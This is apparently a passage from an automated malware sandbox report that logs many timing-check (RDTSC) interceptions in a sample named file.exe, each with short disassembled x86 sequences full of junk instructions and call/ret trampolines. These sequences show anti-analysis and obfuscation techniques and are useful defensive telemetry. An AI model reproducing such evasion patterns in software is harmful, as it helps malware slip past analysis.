[ebp+122D3A3Fh] 0x00000061 push 00000000h 0x00000063 push edx 0x00000064 pop edi 0x00000065 xchg eax, ebx 0x00000066 pushad 0x00000067 pushad 0x00000068 push eax 0x00000069 pop eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE8A1 second address: FCE8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FFB34E3B6D9h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCF182 second address: FCF18C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFB34C126BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCFBDA second address: FCFBE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCFBE0 second address: FCFBE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD0863 second address: FD0868 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD062C second address: FD0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD0868 second address: FD0882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FFB34E3B6CCh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F91014 second address: F91019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F91019 second address: F9101F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD68C1 second address: FD68CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD68CB second address: FD68E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FFB34E3B6CDh 0x0000000b jo 00007FFB34E3B6C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD68E6 second address: FD6905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007FFB34C126BEh 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6905 second address: FD690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD7ABF second address: FD7AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD8A26 second address: FD8A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD8A2C second address: FD8A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB34C126BAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD8A43 second address: FD8A49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDACED second address: FDACF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDACF8 second address: FDACFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDACFC second address: FDAD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDAD02 second address: FDAD2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FFB34E3B6CCh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDAD2C second address: FDAD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB333 second address: FDB356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D9h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB356 second address: FDB39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D2261h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FFB34C126B8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 pushad 0x0000002a xor dl, 00000000h 0x0000002d mov bh, ch 0x0000002f popad 0x00000030 mov bx, cx 0x00000033 push 00000000h 0x00000035 mov bh, dl 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jnp 00007FFB34C126BCh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB39C second address: FDB3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC357 second address: FDC39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FFB34C126C6h 0x00000012 jmp 00007FFB34C126C1h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC39F second address: FDC3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 jns 00007FFB34E3B6C6h 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+122D2EB7h], edx 0x00000017 push 00000000h 0x00000019 mov di, A123h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FFB34E3B6CCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD1F3 second address: FDD1FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD1FD second address: FDD216 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FFB34E3B6C6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnp 00007FFB34E3B6C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB58F second address: FDB5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34C126C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDF40D second address: FDF411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0A0A second address: FE0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FFB34C126C7h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FFB34C126B8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE0A32 second address: FE0A37 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD500 second address: FDD511 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FFB34C126B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1A5D second address: FE1A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e js 00007FFB34E3B6C6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1A78 second address: FE1B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FFB34C126B8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 clc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FFB34C126B8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 jo 00007FFB34C126B6h 0x00000048 movzx ebx, dx 0x0000004b push 00000000h 0x0000004d call 00007FFB34C126C4h 0x00000052 sub edi, 3C9934A2h 0x00000058 pop edi 0x00000059 xchg eax, esi 0x0000005a jo 00007FFB34C126BEh 0x00000060 push edi 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1B03 second address: FE1B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1B0E second address: FE1B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE29F2 second address: FE29F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1C42 second address: FE1CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub ebx, 56E2B42Eh 0x00000012 mov dword ptr [ebp+1246795Ch], ebx 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov ebx, edx 0x00000021 mov ebx, dword ptr [ebp+122D23F2h] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e mov dword ptr [ebp+124798C2h], esi 0x00000034 movzx edi, si 0x00000037 mov eax, dword ptr [ebp+122D125Dh] 0x0000003d push edx 0x0000003e mov di, DBE1h 0x00000042 pop ebx 0x00000043 push FFFFFFFFh 0x00000045 je 00007FFB34C126B9h 0x0000004b mov bx, dx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jnc 00007FFB34C126B6h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE1CA2 second address: FE1CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE8B56 second address: FE8B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9A84 second address: FE9A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9A8A second address: FE9A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9A8E second address: FE9A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9A92 second address: FE9ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, dword ptr [ebp+12461490h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FFB34C126B8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ebx, 492F49F9h 0x00000032 push 00000000h 0x00000034 mov bx, F942h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c ja 00007FFB34C126B6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE9ADE second address: FE9AF4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFB34E3B6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jp 00007FFB34E3B6C6h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE2BC0 second address: FE2BC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE2BC6 second address: FE2BCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE2BCB second address: FE2C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFB34C126B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FFB34C126BCh 0x00000013 mov bx, BBD0h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, dword ptr [ebp+124615F3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FFB34C126B8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+12468DA8h] 0x0000004b mov edi, dword ptr [ebp+122D382Fh] 0x00000051 mov eax, dword ptr [ebp+122D0119h] 0x00000057 push 00000000h 0x00000059 push edx 0x0000005a call 00007FFB34C126B8h 0x0000005f pop edx 0x00000060 mov dword ptr [esp+04h], edx 0x00000064 add dword ptr [esp+04h], 00000015h 0x0000006c inc edx 0x0000006d push edx 0x0000006e ret 0x0000006f pop edx 0x00000070 ret 0x00000071 mov edi, edx 0x00000073 mov dword ptr [ebp+1245F617h], ebx 0x00000079 push FFFFFFFFh 0x0000007b adc di, D2F0h 0x00000080 push eax 0x00000081 jns 00007FFB34C126C8h 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE2C66 second address: FE2C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE2C6A second address: FE2C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE3C14 second address: FE3C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE6DB0 second address: FE6DF1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FFB34C126CAh 0x00000010 jmp 00007FFB34C126C4h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 jmp 00007FFB34C126C1h 0x0000001d pushad 0x0000001e jno 00007FFB34C126B6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE6DF1 second address: FE6E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub dword ptr [ebp+124615F3h], ebx 0x0000000d mov bx, DB72h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov bl, FAh 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 xor bh, 00000054h 0x00000024 mov eax, dword ptr [ebp+122D126Dh] 0x0000002a mov bh, ch 0x0000002c push FFFFFFFFh 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FFB34E3B6C8h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 jp 00007FFB34E3B6D2h 0x0000004e movzx edi, bx 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE6E57 second address: FE6E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FF186F second address: FF187B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007FFB34E3B6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFADE9 second address: FFADEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFADEF second address: FFADF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFADF5 second address: FFADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFADFB second address: FFAE35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CCh 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FFB34E3B6C6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFB34E3B6D7h 0x0000001b jl 00007FFB34E3B6C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFAE35 second address: FFAE45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB0C2 second address: FFB0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFB34E3B6C8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FFB34E3B6CAh 0x00000013 jmp 00007FFB34E3B6CFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB0EA second address: FFB0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FFB34C126B6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB0FC second address: FFB102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB102 second address: FFB106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB234 second address: FFB255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFB34E3B6C6h 0x0000000a jmp 00007FFB34E3B6D2h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB255 second address: FFB259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB259 second address: FFB27F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007FFB34E3B6E7h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FFB34E3B6D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB3DA second address: FFB3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126C7h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFB3FA second address: FFB41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFB34E3B6C6h 0x0000000a popad 0x0000000b jl 00007FFB34E3B6E4h 0x00000011 jo 00007FFB34E3B6CEh 0x00000017 jns 00007FFB34E3B6C6h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001712 second address: 1001716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001716 second address: 100171A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100171A second address: 1001720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001720 second address: 1001725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1001725 second address: 100172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000468 second address: 100046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100075D second address: 1000767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB34C126B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000767 second address: 1000771 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFB34E3B6CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000A6F second address: 1000A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1000A73 second address: 1000A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFB34E3B6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d js 00007FFB34E3B6F0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FFB34E3B6C6h 0x0000001b jno 00007FFB34E3B6C6h 0x00000021 rdtsc
